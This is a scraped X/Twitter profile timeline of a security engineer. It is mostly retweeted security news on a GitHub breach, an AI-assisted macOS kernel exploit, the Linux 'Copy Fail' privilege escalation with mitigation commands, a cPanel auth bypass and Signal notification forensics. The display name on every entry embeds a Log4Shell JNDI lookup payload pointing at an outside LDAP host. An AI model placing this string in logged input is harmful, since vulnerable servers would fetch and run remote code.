Thireus ${jndi:ldap://twt.thi.sh/x} ☠

6K posts

@Thireus

Mobile Application Security Engineering Lead & SME | 0076 7E64 293A E3EC 542B 9C72 3A11 417C B43F DB1A

U.K. Joined July 2011
468 Following, 1.8K Followers

Thireus ${jndi:ldap://twt.thi.sh/x} ☠ retweeted
GitHub (@github):
We are investigating unauthorized access to GitHub’s internal repositories. While we currently have no evidence of impact to customer information stored outside of GitHub’s internal repositories (such as our customers’ enterprises, organizations, and repositories), we are closely monitoring our infrastructure for follow-on activity.

Thireus ${jndi:ldap://twt.thi.sh/x} ☠ retweeted
Cyber Security News (@The_Cyber_News):
⚠️First Public macOS Kernel Exploit on Apple M5 Prepared Using Mythos Preview in Five Days Source: cybersecuritynews.com/first-public-m… Apple's M5 silicon has reportedly been exploited for the first time in a public macOS kernel memory corruption attack, successfully bypassing the company's notable hardware-level memory protection. The exploit chain starts from an unprivileged local user account, uses only standard system calls, and delivers a full root shell, all while Apple's Memory Integrity Enforcement (MIE) is active. The breakthrough was made possible in part by Anthropic's Mythos Preview, a powerful AI model that helped identify the two vulnerabilities and assisted throughout the exploit development process. #cybersecuritynews

Thireus ${jndi:ldap://twt.thi.sh/x} ☠ retweeted
Cyber Security News (@The_Cyber_News):
⚠️ Let's Encrypt Halts Certificate Issuance After Cross-Signed Root Certificate Incident Source: cybersecuritynews.com/lets-encrypt-h… Let's Encrypt temporarily suspended all certificate issuance on May 8, 2026, after engineers identified a critical issue involving a cross-signed certificate linking the organization's Generation X root to its upcoming Generation Y root infrastructure. The incident triggered a complete shutdown of issuance across both production and staging environments before services were restored within hours. At 18:37 UTC on May 8, Let's Encrypt engineers became aware of a potential incident and immediately halted all certificate issuance as a precautionary measure. #cybersecuritynews

Thireus ${jndi:ldap://twt.thi.sh/x} ☠ retweeted
9to5Linux (@9to5linux):
#Linux 7.0.5, 6.18.28, 6.12.87, 6.6.138, 6.1.171, 5.15.205, and 5.10.255 kernels are now available for download at kernel.org to patch the new "Dirty Frag" security vulnerability. #OpenSource

Thireus ${jndi:ldap://twt.thi.sh/x} ☠ retweeted
The Hacker News (@TheHackersNews):
⚠️ UPDATE: #cPanel flaw now tracked as CVE-2026-41940 (CVSS 9.8)—an auth bypass granting unauthenticated admin access. Reportedly exploited as a 0-day, with activity observed for at least 30 days before disclosure. Root cause: CRLF injection enabling session forgery. 🔗 Exploit mechanics and real-world impact → thehackernews.com/2026/04/critic…

Thireus ${jndi:ldap://twt.thi.sh/x} ☠ retweeted
International Cyber Digest (@IntCyberDigest):
‼️🚨 BREAKING: An AI found a Linux kernel zero-day that roots every distribution since 2017. The exploit fits in 732 bytes of Python. Patch your kernel ASAP.

The vulnerability is CVE-2026-31431, nicknamed "Copy Fail," disclosed today by Theori. It has been sitting quietly in the Linux kernel for nine years.

Most Linux privilege-escalation bugs are picky. They need a precise timing window (a "race"), or specific kernel addresses leaked from somewhere, or careful tuning per distribution. Copy Fail needs none of that. It is a straight-line logic mistake that works on the first try, every time, on every mainstream Linux box.

The attacker just needs a normal user account on the machine. From there, the script asks the kernel to do some encryption work, abuses how that work is wired up, and ends up writing 4 bytes into a memory area called the "page cache" (Linux's high-speed copy of files in RAM). Those 4 bytes can be aimed at any program the system trusts, like /usr/bin/su, the shortcut to becoming root. Result: the next time anyone runs that program, it lets the attacker in as root.

What should worry most: the corruption never touches the file on disk. It only exists in Linux's in-memory copy of that file. If you imaged the hard drive afterwards, the on-disk file would match the official package hash exactly. Reboot the machine, or just put it under memory pressure (any normal system load that needs the RAM), and the cached copy reloads fresh from disk.

Containers do not help either. The page cache is shared across the whole host, so a process inside a container can use this bug to compromise the underlying server and reach into other tenants.

The original sin was a 2017 "in-place optimization" in a kernel crypto module called algif_aead. It was meant to make encryption slightly faster. The change broke a critical safety assumption, and nobody noticed for nine years. That bug then rode every kernel update from 2017 to today.

This vulnerability affects the following:
🔴 Shared servers (dev boxes, jump hosts, build servers): any user becomes root
🔴 Kubernetes and container clusters: one compromised pod escapes to the host
🔴 CI runners (GitHub Actions, GitLab, Jenkins): a malicious pull request becomes root on the runner
🔴 Cloud platforms running user code (notebooks, agent sandboxes, serverless functions): a tenant becomes host root

Timeline:
🔴 March 23, 2026: reported to the Linux kernel security team
🔴 April 1: patch committed to mainline (commit a664bf3d603d)
🔴 April 22: CVE assigned
🔴 April 29: public disclosure

Mitigation: update your kernel to a build that includes mainline commit a664bf3d603d. If you cannot patch immediately, turn off the vulnerable module:

    echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
    rmmod algif_aead 2>/dev/null || true

For environments that run untrusted code (containers, sandboxes, CI runners), block access to the kernel's AF_ALG crypto interface entirely, even after patching. Almost nothing legitimate needs it, and blocking it shuts the door on this whole class of bug...

Thireus ${jndi:ldap://twt.thi.sh/x} ☠ retweeted
The Hacker News (@TheHackersNews):
⚡ Apple fixed an iOS bug where deleted notifications stayed stored on devices. The flaw let message data persist after apps like Signal were removed. It surfaced after forensic extraction. The patch now clears and prevents retention. 🔗 Details → thehackernews.com/2026/04/apple-…

Science girl (@sciencegirl):
Chrome plating is a process that coats an object, typically metal or plastic—with a thin layer of chromium to enhance its appearance and durability

Thireus ${jndi:ldap://twt.thi.sh/x} ☠ retweeted
Defiant Ghost (@TheDefiantGhost):
In 2019 Edward Snowden said this about WhatsApp: “The problem with applications like WhatsApp is, it was actually designed to have very strong encryption, just the same as the gold standard today which would be the signal messenger or the wire messenger, but then it was bought by Facebook because it was so good, and now Facebook is quite aggressively reducing the security of WhatsApp about once a quarter, and they’re trying to do it as quietly as possible, so a messenger that the people are comfortable using now is actually a danger to you.” When Snowden speaks, you listen!
Pavel Durov (@durov):

WhatsApp’s “E2E encryption by default” claim is a giant consumer fraud: ~95% of private messages on WhatsApp end up in plain-text backups on Apple/Google servers — not E2E-encrypted. Backup encryption is optional, and few people enable it — let alone use strong passwords.


Thireus ${jndi:ldap://twt.thi.sh/x} ☠ retweeted
Julian Derry (@CyberSamuraiDev):
Most users believe that because Signal uses end-to-end encryption (E2EE), their messages are untouchable. While the pipe is secure, the moment that message hits your screen, it leaves a trail. This specific case highlights a critical persistence artifact, the iOS Notification Center. When a notification pops up, iOS often caches the text in a system database, typically NotificationCenter.db or delimited.db, so you can scroll through your history. Even if you delete the message in the app or delete the app entirely, that system level record remains until it’s overwritten. The FBI didn’t break Signal's encryption, they performed a file system extraction to recover the OS's own logs of what was displayed to the user. The device shown is a Cellebrite UFED. It is the industry standard for bypassing device locks and pulling these hidden SQLite databases during a physical or advanced logical extraction. Your phone is designed for convenience, and convenience is the enemy of privacy. Your device is a silent witness that never stops taking notes. In the world of Mobile Forensics, we don’t always need to crack the vault, we just need to find the notes the operating system left on the desk. To mitigate this, go to Settings > Notifications > Show Previews and set it to "Never" or "When Unlocked."
International Cyber Digest (@IntCyberDigest):

🚨 BREAKING: The FBI has successfully extracted deleted Signal messages from a suspect's iPhone via notification storage, the place where all your notifications are stored for up to one month. Notification storage stores data from all messaging apps, it's a big flaw in iOS. But there's a way to turn it off...


Thireus ${jndi:ldap://twt.thi.sh/x} ☠ retweeted
George (@odysseus0z):
OH: some dude in Fujian (scam capital of China) uses hacked credit cards to subscribe to Claude Code Max, resell them as API at 20% cost, and then sell user traces to Chinese labs for distillation. Bruh.

Thireus ${jndi:ldap://twt.thi.sh/x} ☠ retweeted
Techlore (@TechloreInc):
Big headline, luckily not as scary as it looks, but an important lesson... The FBI extracted Signal messages from a defendant's iPhone even after the app was deleted. Here's what actually happened and what to do 🧵

Thireus ${jndi:ldap://twt.thi.sh/x} ☠ retweeted
Donald J. Trump (@realDonaldTrump):
Don't let Obama play the Iran card in order to start a war in order to get elected--be careful Republicans!

AhMad 𝕏 Ansari (@Ahmadansari2233):
Samsung's new privacy display is wild!!

Qwen (@Alibaba_Qwen):
Qwen3-ASR and Qwen3-ForcedAligner are now open source — production-ready speech models designed for messy, real-world audio, with competitive performance and strong robustness. ● 52 languages & dialects with auto language ID (30 languages + 22 dialects/accents) ● Robust in noisy and complex settings (yes, singing and songs too) ● Long audio support: up to 20 minutes per pass ● Word/phrase-level timestamps:  high-precision alignment for 11 languages via Qwen3-ForcedAligner, stronger than MFA/CTC/CIF-style aligners Also included: a full open-source inference & finetuning stack with vLLM batch, streaming, and async serving. GitHub:  github.com/QwenLM/Qwen3-A… Hugging Face: huggingface.co/collections/Qw… ModelScope: modelscope.cn/collections/Qw… Hugging Face Demo:  huggingface.co/spaces/Qwen/Qw… ModelScope Demo: modelscope.cn/studios/Qwen/Q… Blog:  qwen.ai/blog?id=qwen3a… Paper:  github.com/QwenLM/Qwen3-A…